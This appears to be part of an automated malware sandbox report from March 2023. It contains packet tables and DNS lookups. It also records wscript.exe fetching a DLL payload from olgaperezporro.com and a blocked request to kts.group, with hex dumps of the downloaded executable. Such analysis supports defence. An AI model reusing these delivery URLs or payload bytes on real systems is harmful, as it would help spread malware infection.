                                                                                                  Mar 20, 2023 13:33:58.860882044 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.860912085 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.861027956 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.861079931 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.861093044 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.861098051 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.861143112 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.861166000 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.861840963 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.861891985 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.861938000 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.861944914 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.862001896 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.862023115 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.862417936 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.862518072 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.862545013 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.862613916 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.863946915 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.864006996 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.864058018 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.864070892 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.864157915 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.864157915 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.864418983 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.864464998 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.864506960 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.864515066 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.864543915 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.864559889 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.864990950 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.865039110 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.865071058 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.865077972 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.865106106 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.865123034 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.865525007 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.865569115 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.865597963 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.865603924 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.865629911 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.865648031 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.866193056 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.866238117 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.866269112 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.866276026 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.866317034 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.866336107 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.866713047 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.866761923 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.866791964 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.866799116 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.866820097 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.866844893 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.867482901 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.867527962 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.867558002 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.867566109 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.867590904 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.867623091 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.901467085 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.901501894 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.901638985 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.901658058 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.901689053 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.901712894 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.904345036 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.904380083 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.904443979 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.904453039 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.904488087 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.904505014 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.904941082 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.904970884 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.905005932 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.905013084 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.905036926 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.905054092 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.906372070 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.906402111 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.906465054 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.906471014 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.906517029 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.906980991 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.907012939 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.907071114 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.907075882 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.907104015 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.907119036 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.907583952 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.907614946 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.907690048 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.907696009 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.907741070 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.909341097 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.909372091 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.909435034 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.909445047 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.909471035 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.909488916 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.911459923 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.911494970 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.911535978 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.911544085 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.911586046 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.911868095 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.911916018 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.911976099 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.911984921 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.912028074 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.912046909 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.912306070 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.912342072 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.912388086 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.912451029 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.922794104 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.922822952 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.922846079 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.922939062 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.922951937 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.923005104 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.923027992 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.923068047 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.997819901 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:33:58.998023033 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:34:00.102416992 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:34:00.102485895 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:34:00.102519989 CET49703443192.168.2.340.115.116.248
                                                                                                  Mar 20, 2023 13:34:00.102536917 CET4434970340.115.116.248192.168.2.3
                                                                                                  Mar 20, 2023 13:34:39.278063059 CET497058080192.168.2.3138.197.14.67
                                                                                                  Mar 20, 2023 13:34:39.378521919 CET808049705138.197.14.67192.168.2.3
                                                                                                  Mar 20, 2023 13:34:39.378761053 CET497058080192.168.2.3138.197.14.67
                                                                                                  Mar 20, 2023 13:34:39.385771990 CET497058080192.168.2.3138.197.14.67
                                                                                                  Mar 20, 2023 13:34:39.484761000 CET808049705138.197.14.67192.168.2.3
                                                                                                  Mar 20, 2023 13:34:39.507466078 CET808049705138.197.14.67192.168.2.3
                                                                                                  Mar 20, 2023 13:34:39.507522106 CET808049705138.197.14.67192.168.2.3
                                                                                                  Mar 20, 2023 13:34:39.507626057 CET497058080192.168.2.3138.197.14.67
                                                                                                  Mar 20, 2023 13:34:39.512037992 CET497058080192.168.2.3138.197.14.67
                                                                                                  Mar 20, 2023 13:34:39.611077070 CET808049705138.197.14.67192.168.2.3
                                                                                                  Mar 20, 2023 13:34:39.611901045 CET808049705138.197.14.67192.168.2.3
                                                                                                  Mar 20, 2023 13:34:39.664659977 CET497058080192.168.2.3138.197.14.67
                                                                                                  Mar 20, 2023 13:34:41.269526005 CET497058080192.168.2.3138.197.14.67
                                                                                                  Mar 20, 2023 13:34:41.269629955 CET497058080192.168.2.3138.197.14.67
                                                                                                  Mar 20, 2023 13:34:41.368999958 CET808049705138.197.14.67192.168.2.3
                                                                                                  Mar 20, 2023 13:34:41.369060993 CET808049705138.197.14.67192.168.2.3
                                                                                                  Mar 20, 2023 13:34:51.279237986 CET497058080192.168.2.3138.197.14.67
                                                                                                  Mar 20, 2023 13:34:56.670666933 CET49707443192.168.2.3193.194.92.175
                                                                                                  Mar 20, 2023 13:34:56.670738935 CET44349707193.194.92.175192.168.2.3
                                                                                                  Mar 20, 2023 13:34:56.670850039 CET49707443192.168.2.3193.194.92.175
                                                                                                  Mar 20, 2023 13:34:56.671556950 CET49707443192.168.2.3193.194.92.175
                                                                                                  Mar 20, 2023 13:34:56.671576977 CET44349707193.194.92.175192.168.2.3
                                                                                                  Mar 20, 2023 13:35:07.322268009 CET49707443192.168.2.3193.194.92.175
                                                                                                  Mar 20, 2023 13:35:12.925218105 CET497087080192.168.2.393.84.115.205
                                                                                                  Mar 20, 2023 13:35:15.933590889 CET497087080192.168.2.393.84.115.205
                                                                                                  Mar 20, 2023 13:35:21.933891058 CET497087080192.168.2.393.84.115.205
                                                                                                  Mar 20, 2023 13:35:29.032639980 CET4970980192.168.2.3115.178.55.22
                                                                                                  Mar 20, 2023 13:35:29.300478935 CET8049709115.178.55.22192.168.2.3
                                                                                                  Mar 20, 2023 13:35:29.817295074 CET4970980192.168.2.3115.178.55.22
                                                                                                  Mar 20, 2023 13:35:30.085591078 CET8049709115.178.55.22192.168.2.3
                                                                                                  Mar 20, 2023 13:35:30.594202042 CET4970980192.168.2.3115.178.55.22
                                                                                                  Mar 20, 2023 13:35:30.861855984 CET8049709115.178.55.22192.168.2.3
                                                                                                  Mar 20, 2023 13:35:36.187246084 CET49710443192.168.2.3218.38.121.17
                                                                                                  Mar 20, 2023 13:35:36.187311888 CET44349710218.38.121.17192.168.2.3
                                                                                                  Mar 20, 2023 13:35:36.187464952 CET49710443192.168.2.3218.38.121.17
                                                                                                  Mar 20, 2023 13:35:36.188198090 CET49710443192.168.2.3218.38.121.17
                                                                                                  Mar 20, 2023 13:35:36.188221931 CET44349710218.38.121.17192.168.2.3
                                                                                                  Mar 20, 2023 13:35:37.028597116 CET44349710218.38.121.17192.168.2.3
                                                                                                  Mar 20, 2023 13:35:37.028958082 CET49710443192.168.2.3218.38.121.17

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Mar 20, 2023 13:33:35.045170069 CET5784053192.168.2.38.8.8.8
                                                                                                  Mar 20, 2023 13:33:35.114526033 CET53578408.8.8.8192.168.2.3
                                                                                                  Mar 20, 2023 13:33:56.351597071 CET5799053192.168.2.38.8.8.8
                                                                                                  Mar 20, 2023 13:33:56.568110943 CET53579908.8.8.8192.168.2.3
                                                                                                  Mar 20, 2023 13:33:58.269056082 CET5238753192.168.2.38.8.8.8
                                                                                                  Mar 20, 2023 13:33:58.316931009 CET53523878.8.8.8192.168.2.3

                                                                                                  ICMP Packets

                                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                                  Mar 20, 2023 13:35:12.983458996 CET93.84.115.205192.168.2.390e9(Unknown)Destination Unreachable
                                                                                                  Mar 20, 2023 13:35:15.991839886 CET93.84.115.205192.168.2.390e9(Unknown)Destination Unreachable
                                                                                                  Mar 20, 2023 13:35:21.992082119 CET93.84.115.205192.168.2.390e9(Unknown)Destination Unreachable

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Mar 20, 2023 13:33:35.045170069 CET192.168.2.38.8.8.80x245dStandard query (0)malli.suA (IP address)IN (0x0001)false
                                                                                                  Mar 20, 2023 13:33:56.351597071 CET192.168.2.38.8.8.80xe1d0Standard query (0)kts.groupA (IP address)IN (0x0001)false
                                                                                                  Mar 20, 2023 13:33:58.269056082 CET192.168.2.38.8.8.80x92eStandard query (0)olgaperezporro.comA (IP address)IN (0x0001)false

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Mar 20, 2023 13:33:35.114526033 CET8.8.8.8192.168.2.30x245dNo error (0)malli.su195.2.88.86A (IP address)IN (0x0001)false
                                                                                                  Mar 20, 2023 13:33:56.568110943 CET8.8.8.8192.168.2.30xe1d0No error (0)kts.group31.31.196.93A (IP address)IN (0x0001)false
                                                                                                  Mar 20, 2023 13:33:58.316931009 CET8.8.8.8192.168.2.30x92eNo error (0)olgaperezporro.com40.115.116.248A (IP address)IN (0x0001)false
                                                                                                  Mar 20, 2023 13:34:40.165296078 CET8.8.8.8192.168.2.30x61d7No error (0)au.c-0001.c-msedge.netc-0001.c-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                  Mar 20, 2023 13:34:40.165296078 CET8.8.8.8192.168.2.30x61d7No error (0)c-0001.c-msedge.net13.107.4.50A (IP address)IN (0x0001)false

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • kts.group
                                                                                                  • olgaperezporro.com

                                                                                                  HTTPS Proxied Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  0192.168.2.34970231.31.196.93443C:\Windows\SysWOW64\wscript.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2023-03-20 12:33:58 UTC0OUTGET /35ccbf2003/jKgk8/ HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Accept: */*
                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                  Host: kts.group
                                                                                                  2023-03-20 12:33:58 UTC0INHTTP/1.1 401 Unauthorized
                                                                                                  Server: nginx
                                                                                                  Date: Mon, 20 Mar 2023 12:33:58 GMT
                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  WWW-Authenticate: Basic realm="virus_block | access denied, please check email. For access use regru/regru."
                                                                                                  2023-03-20 12:33:58 UTC0INData Raw: 31 37 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 76 65 72 69 66 79 20 74 68 61 74 20 79 6f 75 0a 61 72 65 20 61 75 74 68 6f 72 69 7a 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 0a 72 65 71 75 65 73 74 65 64 2e 20 20 45 69 74 68 65 72 20 79 6f 75 20 73 75 70 70 6c 69 65 64 20 74 68 65 20 77 72 6f
                                                                                                  Data Ascii: 17d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>401 Unauthorized</title></head><body><h1>Unauthorized</h1><p>This server could not verify that youare authorized to access the documentrequested. Either you supplied the wro


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  1192.168.2.34970340.115.116.248443C:\Windows\SysWOW64\wscript.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2023-03-20 12:33:58 UTC0OUTGET /js/ExGBiCZdkkw0GBAuHNZ/ HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Accept: */*
                                                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                  Host: olgaperezporro.com
                                                                                                  2023-03-20 12:33:58 UTC0INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Mon, 20 Mar 2023 12:32:39 GMT
                                                                                                  Content-Type: application/x-msdownload
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Cache-Control: no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  Expires: Mon, 20 Mar 2023 12:32:39 GMT
                                                                                                  Content-Disposition: attachment; filename="70y0rScYB13.dll"
                                                                                                  Content-Transfer-Encoding: binary
                                                                                                  Set-Cookie: 6418526790327=1679315559; expires=Mon, 20-Mar-2023 12:33:39 GMT; path=/
                                                                                                  Last-Modified: Mon, 20 Mar 2023 12:32:39 GMT
                                                                                                  X-Powered-By: PleskLin
                                                                                                  2023-03-20 12:33:58 UTC1INData Raw: 31 65 31 63 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 44 22 a7 75 25 4c f4 75 25 4c f4 75 25 4c f4 c1 b9 bd f4 70 25 4c f4 c1 b9 bf f4 03 25 4c f4 c1 b9 be f4 78 25 4c f4 03 b8 37 f4 77 25 4c f4 27 4d 49 f5 69 25 4c f4 27 4d 48 f5 7c 25 4c f4 27 4d 4f f5 73 25 4c f4 7c 5d df f4 72 25 4c f4 75 25 4d f4 f7 25 4c f4 dd 4c 45 f5 71 25 4c f4 dd 4c 4c f5 74 25 4c f4 dd 4c b3 f4 74 25 4c f4 75 25 db f4 74 25 4c f4 dd
                                                                                                  Data Ascii: 1e1cMZ@!L!This program cannot be run in DOS mode.$1D"u%Lu%Lu%Lp%L%Lx%L7w%L'MIi%L'MH|%L'MOs%L|]r%Lu%M%LLEq%LLLt%LLt%Lu%t%L
                                                                                                  2023-03-20 12:33:58 UTC16INData Raw: 00 00 48 8b 05 2c 86 05 00 48 33 c4 48 89 45 28 48 8b 85 b8 00 00 00 4c 8b ea 48 8b b5 a0 00 00 00 48 8b d9 48 89 55 88 45 32 ff 48 8b ce 4c 89 44 24 70 49 8b d1 48 89 44 24 78 4d 8b e1 c6 44 24 0d 0a 32 30 30 30 0d 0a 60 00 4d 8b f0 44 88 7c 24 61 e8 a9 f2 ff ff 8b f8 e8 4e f0 ff ff 83 78 78 fe 74 14 e8 43 f0 ff ff 8b 78 78 e8 3b f0 ff ff c7 40 78 fe ff ff ff 83 ff ff 0f 8c 69 03 00 00 83 7e 08 00 74 31 48 63 56 08 4c 8d 05 9a b5 ff ff 49 03 54 24 08 0f b6 0a 83 e1 0f 4a 0f be 84 01 e8 a4 04 00 42 8a 8c 01 f8 a4 04 00 48 2b d0 8b 42 fc d3 e8 eb 02 33 c0 3b f8 0f 8d 28 03 00 00 81 3b 63 73 6d e0 0f 85 c9 00 00 00 83 7b 18 04 0f 85 bf 00 00 00 8b 43 20 2d 20 05 93 19 83 f8 02 0f 87 ae 00 00 00 48 83 7b 30 00 0f 85 a3 00 00 00 e8 b3 ef ff ff 48 83 78 20 00
                                                                                                  Data Ascii: H,H3HE(HLHHHUE2HLD$pIHD$xMD$2000`MD|$aNxxtCxx;@xi~t1HcVLIT$JBH+B3;(;csm{C - H{0Hx
                                                                                                  2023-03-20 12:33:58 UTC32INData Raw: 84 0f b6 40 08 81 e3 00 ff ff ff 0b d8 89 5c 24 38 e9 6f ff ff ff 48 8d 4c 24 40 eb cd 48 89 44 24 30 41 8b 47 08 89 44 24 38 4c 8b fb 48 89 5c 24 50 89 5d a4 39 5d a0 74 4e 33 d2 48 8d 4d 90 e8 5c 3e 00 00 48 8d 15 ed 28 04 00 48 8b d8 48 8d 0d 0a 31 30 30 30 0d 0a 4d f0 e8 79 f0 ff ff 4c 8b c3 48 8d 54 24 40 48 8b c8 e8 99 f5 ff ff 48 8d 54 24 40 48 8d 4c 24 30 e8 66 f6 ff ff f7 05 44 58 05 00 00 10 00 00 74 45 e9 8b 07 00 00 45 33 c0 48 8d 0d 4b 58 05 00 41 8d 50 10 e8 aa 2e 00 00 4c 8b f8 48 85 c0 74 08 48 89 18 89 58 08 eb 03 4c 8b fb 49 8b d7 48 8d 4d f0 e8 e7 3d 00 00 48 8b 08 8b 40 08 48 89 4c 24 50 89 45 a4 45 85 ed 0f 84 03 01 00 00 41 81 fc 00 08 00 00 0f 85 c2 00 00 00 8b c6 25 00 07 00 00 3d 00 06 00 00 75 6b 48 8d 15 4a 28 04 00 48 8d 4d f0
                                                                                                  Data Ascii: @\$8oHL$@HD$0AGD$8LH\$P]9]tN3HM\>H(HH1000MyLHT$@HHT$@HL$0fDXtEE3HKXAP.LHtHXLIHM=H@HL$PEEA%=ukHJ(HM
                                                                                                  2023-03-20 12:33:58 UTC48INData Raw: 00 83 e9 08 0f 84 13 01 00 00 83 f9 08 74 12 48 8d 4d 00 e8 d1 ee ff ff 48 8d 55 10 e9 97 02 00 00 49 8b de 44 89 74 24 28 48 8d 42 01 48 89 5c 24 20 48 89 05 94 18 05 00 45 33 c0 48 8d 4c 24 50 b2 01 e8 5d 18 00 00 8b 44 24 58 84 c0 75 3e 48 85 db 74 32 4c 8d 05 e9 e7 03 00 48 8d 55 20 48 8d 4c 24 50 e8 33 b6 ff ff 4c 8d 44 24 20 48 8b c8 48 8d 55 30 e8 9e b5 ff ff 48 8b 18 8b 40 08 89 44 24 28 eb 12 48 8b 5c 24 50 eb f3 c7 44 24 28 02 00 00 00 49 8b de 48 89 5c 24 20 44 38 74 24 28 75 68 48 8b 05 21 18 05 00 80 38 40 75 88 41 b8 01 00 00 00 c6 85 20 01 00 00 5b 48 8d 95 20 01 00 00 4c 89 74 24 60 48 8d 4c 24 60 44 89 74 24 68 e8 18 c8 ff ff 4c 8d 44 24 20 48 8d 55 a0 48 8d 4c 24 60 e8 2d b5 ff ff 41 b0 5d 48 8d 55 40 48 8d 4d a0 e8 49 b5 ff ff 48 8b 08
                                                                                                  Data Ascii: tHMHUIDt$(HBH\$ HE3HL$P]D$Xu>Ht2LHU HL$P3LD$ HHU0H@D$(H\$PD$(IH\$ D8t$(uhH!8@uA [H Lt$`HL$`Dt$hLD$ HUHL$`-A]HU@HMIH
                                                                                                  2023-03-20 12:33:58 UTC64INData Raw: 33 d2 83 64 24 28 00 33 c9 4c 8b 06 48 83 64 24 20 00 ff 15 bd 98 03 00 48 63 e8 85 c0 74 c9 ba 01 00 00 00 48 8b cd e8 dd dd 01 00 48 8b d8 48 85 c0 74 5b 48 83 64 24 38 00 41 83 c9 ff 48 83 64 24 30 00 33 d2 4c 8b 06 33 c9 89 6c 24 28 48 89 44 24 20 ff 15 7b 98 03 00 85 c0 74 31 33 d2 48 8b cb e8 f9 0a 02 00 33 c9 e8 8e de 01 00 48 83 c6 08 48 83 3e 00 0f 85 73 ff ff ff 33 c0 48 8b 5c 24 50 48 8b 6c 24 58 48 83 c4 40 5e c3 48 8b cb e8 66 de 01 00 e9 4c ff ff ff cc 48 89 5c 24 08 48 89 6c 24 10 56 48 83 ec 30 48 8b 35 ba db 04 00 48 85 f6 75 70 83 c8 ff eb 73 83 64 24 28 00 41 83 c9 ff 4c 8b 06 33 d2 48 83 64 24 20 00 33 c9 ff 15 f4 97 03 00 48 63 e8 85 c0 74 d8 ba 02 00 00 00 48 8b cd e8 1c dd 01 00 48 8b d8 48 85 c0 74 4b 4c 8b 06 41 83 c9 ff 89 6c 24
                                                                                                  Data Ascii: 3d$(3LHd$ HctHHHt[Hd$8AHd$03L3l$(HD$ {t13H3HH>s3H\$PHl$XH@^HfLH\$Hl$VH0H5Hupsd$(AL3Hd$ 3HctHHHtKLAl$
